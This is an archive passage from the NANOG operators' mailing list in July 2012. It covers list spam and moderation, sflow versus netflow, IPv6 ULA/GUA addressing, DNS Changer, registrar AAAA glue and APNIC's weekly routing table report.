From skeeve at eintellego.net Fri Jul 13 12:48:47 2012 From: skeeve at eintellego.net (Skeeve Stevens) Date: Sat, 14 Jul 2012 03:48:47 +1000 Subject: The Cidr Report In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: I think the effort to moderate this particular list would be far too much effort. Skeeve Stevens, CEO - eintellego Pty Ltd skeeve at eintellego.net ; www.eintellego.net Phone: 1300 753 383; Cell +61 (0)414 753 383 ; skype://skeeve facebook.com/eintellego ; linkedin.com/in/skeeve twitter.com/networkceoau ; blog: www.network-ceo.net The Experts Who The Experts Call Juniper - Cisco - IBM On Sat, Jul 14, 2012 at 3:46 AM, Grant Ridder wrote: > if the admins are not going to moderate this list... give me the admin > password to the list serve and i will set it up right... gees >
From hhoffman at ip-solutions.net Fri Jul 13 12:52:28 2012 From: hhoffman at ip-solutions.net (Harry Hoffman) Date: Fri, 13 Jul 2012 13:52:28 -0400 Subject: Real world sflow vs netflow? In-Reply-To: References: Message-ID: <5000605C.3030804@ip-solutions.net> Hi David, I'm not sure that sflow is going to get you the granularity that you are looking for. It's usually better to start more granular and then aggregate into larger flows when you graph or reference for historic values. Have you looked at other options, such as argus [1] to collect flow data outside of the networking gear? This way the networking gear can do its primary job and flow collection can happen elsewhere. There's a whole argus community that discusses the information security topics you're interested in and Carter, the guy who wrote all (?) of the code, is very responsive. Argus can also take in NetFlow flows from your routers.
There are obviously other tools available, that may work as well or better, but argus is one I've been using with great success in a fairly heavily trafficked environment. Cheers, Harry [1] http://www.qosient.com/argus/ On 07/13/2012 01:30 PM, David Hubbard wrote: > Can anyone on or off list give me some real world > thoughts on sflow vs netflow for border > routers? (multi-homed, BGP, straight v4 & v6 only > for web hosting, no mpls, vpns, vlans, etc.) > > Finding it hard to decipher the vendor version > of the answer to that question. We use > netflow v9 currently but are considering hardware > that would be sflow. We don't use it for > billing purposes, mostly for spotting malicious > remote hosts doing things like scans, spotting > traffic such as weird ports in use in either > direction that warrant further investigation, > watching for ddos/dos destinations to act on > mitigation, or investigating the nature of unusual > levels of traffic on switch ports that set off > alarms. I'm concerned things like port scans, > etc. won't be picked up by the NMS if fed by > sflow due to the sampling nature, or similar > concern if 500 ssh connections by the same remote > host are sampled as 1 connection, etc. Of course > these concerns were put in my head by someone > interested in me continuing to use equipment that > happens to output netflow data, hence me wanting some > real people answers. :-) > > Thanks! > > > From shrdlu at deaddrop.org Fri Jul 13 12:56:05 2012 From: shrdlu at deaddrop.org (Lynda) Date: Fri, 13 Jul 2012 10:56:05 -0700 Subject: The Cidr Report In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <50006135.8070202@deaddrop.org> On 7/13/2012 10:46 AM, Grant Ridder wrote: > if the admins are not going to moderate this list... 
give me the admin > password to the list serve and i will set it up right. These emails seem to be originating from comcast (75.144.246.6). Please note I said "seem to be" since it's very easy to forge such things. I was quite sad when yahoo started dispensing *new* accounts from Rocketmail (a property they acquired in the long ago times), since I have a rocketmail account that long predates yahoo, or the acquisition. Still, there needs to be a filter of some sort set up. Mailman permits this, and I'd be a fan of it. It seems to be generated by someone who has the serious hate on for the list. That actually narrows it down quite a bit. Maybe I'll do a bit of traffic analysis over the weekend. Or not... -- Politicians are like a Slinky. They're really not good for anything, but they still bring a smile to your face when you push them down a flight of stairs.
From Jean-Francois.TremblayING at videotron.com Fri Jul 13 12:56:11 2012 From: Jean-Francois.TremblayING at videotron.com (Jean-Francois.TremblayING at videotron.com) Date: Fri, 13 Jul 2012 13:56:11 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <50004AF9.9010601@gmail.com> Message-ID: -Hammer- wrote on 13/07/2012 12:21:13 PM: > I like the ULA approach. Global and ULA are two approaches, but there's a third one: GUA + ULA. We actually put a GUA on servers speaking publicly, a ULA on servers speaking in our domain only and *both* ULA and GUA on servers which talk both ways. Our datacenter firewalls are configured to enforce GUA-GUA and ULA-ULA connections only (just simple URPF over two interfaces). This setup works very well; surprisingly, we've had very few source address selection problems so far (knock on wood). We're very happy that the separation between public and "private" networks is clear; it helps a lot with debugging and service separation.
/JF From shortdudey123 at gmail.com Fri Jul 13 12:59:58 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Fri, 13 Jul 2012 12:59:58 -0500 Subject: The Cidr Report In-Reply-To: <50006135.8070202@deaddrop.org> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <50006135.8070202@deaddrop.org> Message-ID: Mailman also allows keyword filtering On Fri, Jul 13, 2012 at 12:56 PM, Lynda wrote: > On 7/13/2012 10:46 AM, Grant Ridder wrote: > >> if the admins are not going to moderate this list... give me the admin >> password to the list serve and i will set it up right. >> > > These emails seem to be originating from comcast (75.144.246.6). Please > note I said "seem to be" since it's very easy to forge such things. I was > quite sad when yahoo started dispensing *new* accounts from Rocketmail (a > property they acquired in the long ago times), since I have a rocketmail > account that long predates yahoo, or the acquisition. > > Still, there needs to be a filter of some sort set up. Mailman permits > this, and I'd be a fan of it. It seems to be generated by someone who has > the serious hate on for the list. That actually narrows it down quite a > bit. Maybe I'll do a bit of traffic analysis over the weekend. > > Or not... > > -- > Politicians are like a Slinky. > They're really not good for anything, > but they still bring a smile to your face > when you push them down a flight of stairs. 
> > From jcdill.lists at gmail.com Fri Jul 13 13:20:44 2012 From: jcdill.lists at gmail.com (JC Dill) Date: Fri, 13 Jul 2012 11:20:44 -0700 Subject: The Cidr Report In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <500066FC.6030707@gmail.com> On 13/07/12 10:46 AM, Grant Ridder wrote: > if the admins are not going to moderate this list... give me the admin > password to the list serve and i will set it up right... gees +1 jc From robertg at garlic.com Fri Jul 13 13:32:13 2012 From: robertg at garlic.com (Robert Glover) Date: Fri, 13 Jul 2012 11:32:13 -0700 Subject: Akamai infrastructure tech Message-ID: <500069AD.7040705@garlic.com> If someone with Akamai is watching, can you please have someone from infrastructure contact me? We host an Akamai server, a drive started taking errors, Akamai shipped us a new drive, but did not tell us which of the eight drives in the server needs to be replaced. Normal contact channels have resulted in voicemail or no clue :( Thanks, -Robert From paul at paulstewart.org Fri Jul 13 13:39:56 2012 From: paul at paulstewart.org (Paul Stewart) Date: Fri, 13 Jul 2012 14:39:56 -0400 Subject: Akamai infrastructure tech In-Reply-To: <500069AD.7040705@garlic.com> References: <500069AD.7040705@garlic.com> Message-ID: <014c01cd6126$e7799990$b66cccb0$@paulstewart.org> That's unusual... we've gone through hard drive replacements many times and always gotten a detailed email from them before the hard drive arrived.... Paul -----Original Message----- From: Robert Glover [mailto:robertg at garlic.com] Sent: July-13-12 2:32 PM To: nanog at nanog.org Subject: Akamai infrastructure tech If someone with Akamai is watching, can you please have someone from infrastructure contact me? 
We host an Akamai server, a drive started taking errors, Akamai shipped us a new drive, but did not tell us which of the eight drives in the server needs to be replaced. Normal contact channels have resulted in voicemail or no clue :( Thanks, -Robert
From trejrco at gmail.com Fri Jul 13 13:47:26 2012 From: trejrco at gmail.com (TJ) Date: Fri, 13 Jul 2012 14:47:26 -0400 Subject: using "reserved" IPv6 space In-Reply-To: References: <50004AF9.9010601@gmail.com> Message-ID: On Fri, Jul 13, 2012 at 1:56 PM, wrote: > -Hammer- wrote on 13/07/2012 12:21:13 PM: > > > I like the ULA approach. > > Global and ULA are two approaches, but there's a third one: GUA + ULA. We > actually put a GUA on servers speaking publicly, a ULA on servers speaking > in our domain only and *both* ULA and GUA on servers which talk both ways. > Our datacenter firewalls are configured to enforce GUA-GUA and ULA-ULA > connections only (just simple URPF over two interfaces). > > This setup works very well, surprisingly we've had very little source > address selection problems so far (knock on wood). We're very happy that > the separation between public and "private" networks is clear, it helps a > lot with debugging and service separation. > Off the top of my head, the first problem you might hit there is WRT multicast ...
*(ULA might "win" some source address selections that you want GUA to win)* /TJ
From owen at delong.com Fri Jul 13 13:48:36 2012 From: owen at delong.com (Owen DeLong) Date: Fri, 13 Jul 2012 11:48:36 -0700 Subject: DNS Changer items In-Reply-To: <8418792.13134.1341682284168.JavaMail.root@benjamin.baylink.com> References: <8418792.13134.1341682284168.JavaMail.root@benjamin.baylink.com> Message-ID: <7666DE8C-909C-4C4A-9CDB-16C49574F183@delong.com> On Jul 7, 2012, at 10:31 AM, Jay Ashworth wrote: > ----- Original Message ----- >> From: "Seth Mattinen" > >>> On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: >>>> The dns-ok.us site is getting crushed from all the sudden media >>>> interest. >>> >>> One wonders why it's so hard to get the media interested when it >>> would be *helpful*. DNS Changer gets traction like 3 days before the >>> drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's >>> to give to regionals, etc... >> >> Reactive is easier to justify to the powers that be than proactive. > > It's easier to justify *not* being smart enough to deal with the problem > when it doesn't cause a major disruption? > When it isn't causing a major problem, the powers that be have a harder time understanding the need to act. Once it is causing a major disruption, the powers that be have no trouble understanding the need to act. This is not veneration of stupidity, it is human nature. Often summarized in the colloquialism "The squeaky wheel gets the grease." Owen
From nanog at techmonkeys.org Fri Jul 13 13:58:07 2012 From: nanog at techmonkeys.org (Jeff Fisher) Date: Fri, 13 Jul 2012 12:58:07 -0600 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <50006FBF.3000408@techmonkeys.org> On 07/13/2012 06:43 AM, Brandon Applegate wrote: > So I sent an email over a week ago to ipv6req at networksolutions.com - and > since I've only received the auto reply.
> > A year or so ago I did this and got very quick turnaround, but now just > dead air (sent another email yesterday). > > Wanted to see if others had the same results (recently) and any advice > before I call into phone tree hell. Thanks. I waited over a month before I finally got fed up and e-mailed nanog for advice. I was told to e-mail listen at networksolutions.com and amazingly, it worked -- within a day, my records were changed. Jeff
From cscora at apnic.net Fri Jul 13 14:10:16 2012 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 14 Jul 2012 05:10:16 +1000 (EST) Subject: Weekly Routing Table Report Message-ID: <201207131910.q6DJALBm008870@thyme.rand.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, LacNOG, TRNOG, CaribNOG and the RIPE Routing Working Group. Daily listings are sent to bgp-stats at lists.apnic.net. For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith.
Routing Table Report 04:00 +10GMT Sat 14 Jul, 2012 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 416525 Prefixes after maximum aggregation: 175957 Deaggregation factor: 2.37 Unique aggregates announced to Internet: 202804 Total ASes present in the Internet Routing Table: 41495 Prefixes per ASN: 10.04 Origin-only ASes present in the Internet Routing Table: 33311 Origin ASes announcing only one prefix: 15683 Transit ASes present in the Internet Routing Table: 5581 Transit-only ASes present in the Internet Routing Table: 135 Average AS path length visible in the Internet Routing Table: 4.5 Max AS path length visible: 31 Max AS path prepend of ASN ( 51742) 24 Prefixes from unregistered ASNs in the Routing Table: 404 Unregistered ASNs in the Routing Table: 131 Number of 32-bit ASNs allocated by the RIRs: 2974 Number of 32-bit ASNs visible in the Routing Table: 2603 Prefixes from 32-bit ASNs in the Routing Table: 6761 Special use prefixes present in the Routing Table: 1 Prefixes being announced from unallocated address space: 162 Number of addresses announced to Internet: 2565104428 Equivalent to 152 /8s, 228 /16s and 99 /24s Percentage of available address space announced: 69.2 Percentage of allocated address space announced: 69.3 Percentage of available address space allocated: 99.9 Percentage of address space in use by end-sites: 93.0 Total number of prefixes smaller than registry allocations: 144361 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 101982 Total APNIC prefixes after maximum aggregation: 32789 APNIC Deaggregation factor: 3.11 Prefixes being announced from the APNIC address blocks: 102433 Unique aggregates announced from the APNIC address blocks: 42106 APNIC Region origin ASes present in the Internet Routing Table: 4715 APNIC Prefixes per ASN: 21.72 APNIC Region origin ASes 
announcing only one prefix: 1243 APNIC Region transit ASes present in the Internet Routing Table: 739 Average APNIC Region AS path length visible: 4.6 Max APNIC Region AS path length visible: 26 Number of APNIC region 32-bit ASNs visible in the Routing Table: 245 Number of APNIC addresses announced to Internet: 704212608 Equivalent to 41 /8s, 249 /16s and 110 /24s Percentage of available APNIC address space announced: 82.3 APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 131072-133119 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 152258 Total ARIN prefixes after maximum aggregation: 77460 ARIN Deaggregation factor: 1.97 Prefixes being announced from the ARIN address blocks: 153294 Unique aggregates announced from the ARIN address blocks: 68403 ARIN Region origin ASes present in the Internet Routing Table: 15189 ARIN Prefixes per ASN: 10.09 ARIN Region origin ASes announcing only one prefix: 5766 ARIN Region transit ASes present in the Internet Routing Table: 1612 Average ARIN Region AS path length visible: 4.1 Max ARIN Region AS path length visible: 24 Number of ARIN region 32-bit ASNs visible in the Routing Table: 17 Number of ARIN addresses announced to Internet: 1071305600 Equivalent to 63 /8s, 218 /16s and 211 /24s Percentage of available ARIN address space announced: 56.7 ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 7723-8191, 
10240-12287, 13312-15359, 16384-17407 18432-20479, 21504-23551, 25600-26591, 26624-27647, 29696-30719, 31744-33791 35840-36863, 39936-40959, 46080-47103 53248-55295, 393216-394239 ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8, RIPE Region Analysis Summary ---------------------------- Prefixes being announced by RIPE Region ASes: 103627 Total RIPE prefixes after maximum aggregation: 55173 RIPE Deaggregation factor: 1.88 Prefixes being announced from the RIPE address blocks: 105822 Unique aggregates announced from the RIPE address blocks: 67104 RIPE Region origin ASes present in the Internet Routing Table: 16657 RIPE Prefixes per ASN: 6.35 RIPE Region origin ASes announcing only one prefix: 8072 RIPE Region transit ASes present in the Internet Routing Table: 2711 Average RIPE Region AS path length visible: 5.0 Max RIPE Region AS path length visible: 31 Number of RIPE region 32-bit ASNs visible in the Routing Table: 1715 Number of RIPE addresses announced to Internet: 635650436 Equivalent to 37 /8s, 227 /16s and 65 /24s Percentage of available RIPE address space announced: 92.4 RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614 (pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631 6656-6911, 8192-9215, 12288-13311, 15360-16383 20480-21503, 24576-25599, 
28672-29695 30720-31743, 33792-35839, 38912-39935 40960-45055, 47104-52223, 56320-58367 59392-61439, 196608-199679 RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8, LACNIC Region Analysis Summary ------------------------------ Prefixes being announced by LACNIC Region ASes: 42512 Total LACNIC prefixes after maximum aggregation: 8355 LACNIC Deaggregation factor: 5.09 Prefixes being announced from the LACNIC address blocks: 45201 Unique aggregates announced from the LACNIC address blocks: 21759 LACNIC Region origin ASes present in the Internet Routing Table: 1610 LACNIC Prefixes per ASN: 28.08 LACNIC Region origin ASes announcing only one prefix: 430 LACNIC Region transit ASes present in the Internet Routing Table: 307 Average LACNIC Region AS path length visible: 4.7 Max LACNIC Region AS path length visible: 25 Number of LACNIC region 32-bit ASNs visible in the Routing Table: 621 Number of LACNIC addresses announced to Internet: 112309160 Equivalent to 6 /8s, 177 /16s and 179 /24s Percentage of available LACNIC address space announced: 66.9 LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 262144-263167 plus ERX transfers LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8, AfriNIC Region Analysis Summary ------------------------------- Prefixes being announced by AfriNIC Region ASes: 9181 Total AfriNIC prefixes after maximum aggregation: 2126 AfriNIC Deaggregation factor: 4.32 Prefixes being announced from the AfriNIC address blocks: 9613 Unique aggregates announced from the AfriNIC address blocks: 3291 AfriNIC Region origin ASes present in the Internet Routing Table: 553 AfriNIC Prefixes per ASN: 17.38 AfriNIC Region origin ASes announcing only one prefix: 172 AfriNIC Region transit ASes present 
in the Internet Routing Table: 124 Average AfriNIC Region AS path length visible: 4.4 Max AfriNIC Region AS path length visible: 25 Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 5 Number of AfriNIC addresses announced to Internet: 41186304 Equivalent to 2 /8s, 116 /16s and 116 /24s Percentage of available AfriNIC address space announced: 40.9 AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8, APNIC Region per AS prefix count summary ---------------------------------------- ASN No of nets /20 equiv MaxAgg Description 4766 2733 11119 1236 Korea Telecom (KIX) 17974 2217 558 80 PT TELEKOMUNIKASI INDONESIA 7545 1690 301 86 TPG Internet Pty Ltd 4755 1613 388 162 TATA Communications formerly 9829 1303 1085 28 BSNL National Internet Backbo 9583 1167 88 505 Sify Limited 7552 1128 1062 11 Vietel Corporation 4808 1117 2053 318 CNCGROUP IP network: China169 24560 1037 385 165 Bharti Airtel Ltd., Telemedia 9498 982 291 68 BHARTI Airtel Ltd. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC ARIN Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 6389 3389 3773 187 bellsouth.net, inc. 7029 3337 998 177 Windstream Communications Inc 18566 2088 382 181 Covad Communications 1785 1935 681 130 PaeTec Communications, Inc. 22773 1665 2911 121 Cox Communications, Inc. 
20115        1648       1571     615  Charter Communications
4323         1575       1043     384  Time Warner Telecom
30036        1388        269     785  Mediacom Communications Corp
7018         1258      10044     823  AT&T WorldNet Services
7011         1197        320     696  Citizens Utilities

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN

RIPE Region per AS prefix count summary
---------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
8402         1589        544      16  Corbina telecom
2118         1023         97      14  EUnet/RELCOM Autonomous Syste
12479         796        741      94  Uni2 Autonomous System
34984         728        189     174  BILISIM TELEKOM
6830          709       2292     443  UPC Distribution Services
31148         702         37       9  FreeNet ISP
20940         684        220     531  Akamai Technologies European
8551          577        364      61  Bezeq International
13188         576        100      10  Educational Network
3320          500       8443     410  Deutsche Telekom AG

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE

LACNIC Region per AS prefix count summary
-----------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
28573        2003       1214      55  NET Servicos de Comunicao S.A
10620        1990        346     208  TVCABLE BOGOTA
6503         1523        418      66  AVANTEL, S.A.
8151         1466       3042     343  UniNet S.A. de C.V.
7303         1454        934     194  Telecom Argentina Stet-France
6458          854         81      15  GUATEL
27947         714         73      93  Telconet S.A
11172         643         91      74  Servicios Alestra S.A de C.V
3816          588        246      90  Empresa Nacional de Telecomun
22047         583        326      15  VTR PUNTO NET S.A.
Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC

AfriNIC Region per AS prefix count summary
------------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
8452         1156        958      13  TEDATA
24863         863        274      32  LINKdotNET AS number
6713          508        649      18  Itissalat Al-MAGHRIB
24835         285         80       8  RAYA Telecom - Egypt
3741          262        905     223  The Internet Solution
12258         197         28      62  Vodacom Internet Company
33776         194         12      18  Starcomms Nigeria Limited
29975         191        667      21  Vodacom
16637         170        664      87  MTN Network Solutions
15706         159         32       6  Sudatel Internet Exchange Aut

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC

Global Per AS prefix count summary
----------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
6389         3389       3773     187  bellsouth.net, inc.
7029         3337        998     177  Windstream Communications Inc
4766         2733      11119    1236  Korea Telecom (KIX)
17974        2217        558      80  PT TELEKOMUNIKASI INDONESIA
18566        2088        382     181  Covad Communications
28573        2003       1214      55  NET Servicos de Comunicao S.A
10620        1990        346     208  TVCABLE BOGOTA
1785         1935        681     130  PaeTec Communications, Inc.
7545         1690        301      86  TPG Internet Pty Ltd
22773        1665       2911     121  Cox Communications, Inc.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet

Global Per AS Maximum Aggr summary
----------------------------------

ASN    No of nets  Net Savings  Description
7029         3337         3160  Windstream Communications Inc
17974        2217         2137  PT TELEKOMUNIKASI INDONESIA
28573        2003         1948  NET Servicos de Comunicao S.A
18566        2088         1907  Covad Communications
1785         1935         1805  PaeTec Communications, Inc.
10620        1990         1782  TVCABLE BOGOTA
7545         1690         1604  TPG Internet Pty Ltd
8402         1589         1573  Corbina telecom
22773        1665         1544  Cox Communications, Inc.
4766         2733         1497  Korea Telecom (KIX)

Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet

List of Unregistered Origin ASNs (Global)
-----------------------------------------

Bad AS  Designation  Network          Transit AS  Description
15132   UNALLOCATED  12.9.150.0/24          7018  AT&T WorldNet Servic
25639   UNALLOCATED  12.41.169.0/24         7018  AT&T WorldNet Servic
13317   UNALLOCATED  12.44.10.0/24          7018  AT&T WorldNet Servic
23502   UNALLOCATED  12.44.44.0/24          7018  AT&T WorldNet Servic
17300   UNALLOCATED  12.45.103.0/24         7018  AT&T WorldNet Servic
17300   UNALLOCATED  12.45.110.0/24          701  UUNET Technologies,
16476   UNALLOCATED  12.46.27.0/24          7018  AT&T WorldNet Servic
14764   UNALLOCATED  12.108.237.0/24        7018  AT&T WorldNet Servic
33649   UNALLOCATED  12.111.112.0/24       19029  New Edge Networks
29760   UNALLOCATED  12.145.34.0/23         7018  AT&T WorldNet Servic

Complete listing at http://thyme.rand.apnic.net/current/data-badAS

Prefixes from private and non-routed address space (Global)
-----------------------------------------------------------

Prefix           Origin AS  Description
198.18.0.0/15        14744  Internap Network Services

Complete listing at http://thyme.rand.apnic.net/current/data-dsua

Advertised Unallocated Addresses
--------------------------------

Network           Origin AS  Description
5.144.160.0/20        12637  SEEWEB srl
14.192.0.0/22         45464  Room 201, TGU Bldg
14.192.4.0/22         45464  Room 201, TGU Bldg
14.192.8.0/22         45464  Room 201, TGU Bldg
14.192.12.0/22        45464  Room 201, TGU Bldg
14.192.16.0/22        45464  Room 201, TGU Bldg
14.192.20.0/22        45464  Room 201, TGU Bldg
14.192.24.0/22        45464  Room 201, TGU Bldg
14.192.28.0/22        45464  Room 201, TGU Bldg
27.112.114.0/24       23884  Proimage Engineering and Comm

Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA

Number of prefixes announced per prefix length (Global)
-------------------------------------------------------

/1:0      /2:0      /3:0      /4:0      /5:0      /6:0      /7:0      /8:19
/9:12     /10:28    /11:82    /12:236   /13:471   /14:843   /15:1519  /16:12288
/17:6367  /18:10787 /19:20871 /20:29736 /21:31544 /22:41211
/23:39218 /24:217439 /25:1237 /26:1489 /27:857 /28:168 /29:62 /30:18
/31:0     /32:23

Advertised prefixes smaller than registry allocations
-----------------------------------------------------

ASN    No of nets  Total ann.  Description
7029         2673        3337  Windstream Communications Inc
18566        2038        2088  Covad Communications
6389         1868        3389  bellsouth.net, inc.
30036        1323        1388  Mediacom Communications Corp
8402         1285        1589  Corbina telecom
11492        1154        1191  Cable One
22773        1095        1665  Cox Communications, Inc.
6503         1051        1523  AVANTEL, S.A.
1785         1043        1935  PaeTec Communications, Inc.
7011          934        1197  Citizens Utilities

Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos

Number of /24s announced per /8 block (Global)
----------------------------------------------

1:579    2:691    3:1      4:13     5:128    6:3      8:419    12:2007
13:1     14:636   15:12    16:3     17:5     20:24    23:188   24:1786
27:1329  31:1014  32:56    33:2     34:2     36:8     37:615   38:822
39:1     40:128   41:3016  42:141   44:3     46:1523  47:2     49:430
50:553   52:13    54:14    55:7     56:1     57:34    58:978   59:527
60:245   61:1335  62:923   63:2005  64:4229  65:2238  66:4495  67:2025
68:1140  69:3195  70:980   71:512   72:1868  74:2599  75:479   76:334
77:934   78:905   79:492   80:1215  81:942   82:650   83:523   84:500
85:1160  86:425   87:933   88:357   89:1684  90:303   91:5015  92:582
93:1302  94:1563  95:1242  96:357   97:321   98:887   99:39    100:20
101:256  103:1248 106:115  107:189  108:370  109:1461 110:789  111:939
112:428  113:654  114:655  115:905  116:920  117:722  118:903  119:1220
120:349  121:798  122:1662 123:1164 124:1380 125:1254 128:552  129:185
130:264  131:632  132:300  133:22   134:246  135:61   136:218  137:239
138:334  139:177  140:493  141:246  142:431  143:374  144:474  145:77
146:518  147:281  148:769  149:317  150:151  151:185  152:475  153:176
154:17   155:432  156:220  157:381  158:190  159:625  160:343  161:274
162:379  163:192  164:666  165:410  166:589  167:532  168:914  169:125
170:896  171:146  172:5    173:1726 174:607  175:437  176:563  177:955
178:1619 180:1303 181:104  182:989  183:230  184:539  186:1983 187:1089
188:1367 189:1592 190:6058 192:6008 193:5525 194:4476
195:3229 196:1211 197:170  198:3677 199:4860 200:5959 201:1992 202:8712
203:8667 204:4381 205:2523 206:2786 207:2761 208:4031 209:3626 210:2791
211:1561 212:1970 213:1813 214:867  215:83   216:5088 217:1550 218:556
219:339  220:1228 221:569  222:337  223:350

End of report

From Jean-Francois.TremblayING at videotron.com  Fri Jul 13 14:35:12 2012
From: Jean-Francois.TremblayING at videotron.com (Jean-Francois.TremblayING at videotron.com)
Date: Fri, 13 Jul 2012 15:35:12 -0400
Subject: using "reserved" IPv6 space
In-Reply-To:
Message-ID:

TJ wrote on 13/07/2012 02:47:26 PM:

> Off the top of my head, the first problem you might hit there is
> WRT multicast ...
> (ULA might "win" some source address selections that you want GUA to win)
> /TJ

Good point, thanks for pointing that out.
We'll see when we deploy network-wide IPv6 multicast... not there (yet).

/JF

From patrick at ianai.net  Fri Jul 13 14:49:29 2012
From: patrick at ianai.net (Patrick W. Gilmore)
Date: Fri, 13 Jul 2012 15:49:29 -0400
Subject: Communications Committee volunteers [was: The Cidr Report]
In-Reply-To: <500066FC.6030707@gmail.com>
References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <500066FC.6030707@gmail.com>
Message-ID:

On Jul 13, 2012, at 14:20 , JC Dill wrote:
> On 13/07/12 10:46 AM, Grant Ridder wrote:

>> if the admins are not going to moderate this list... give me the admin
>> password to the list serve and i will set it up right... gees
>
> +1

Most excellent!

Just so you know, "the admins" are the Communications Committee, and they are always looking for new volunteers.

I assume you both will be volunteering forthwith?
--
TTFN,
patrick

From jared at puck.nether.net  Fri Jul 13 14:51:14 2012
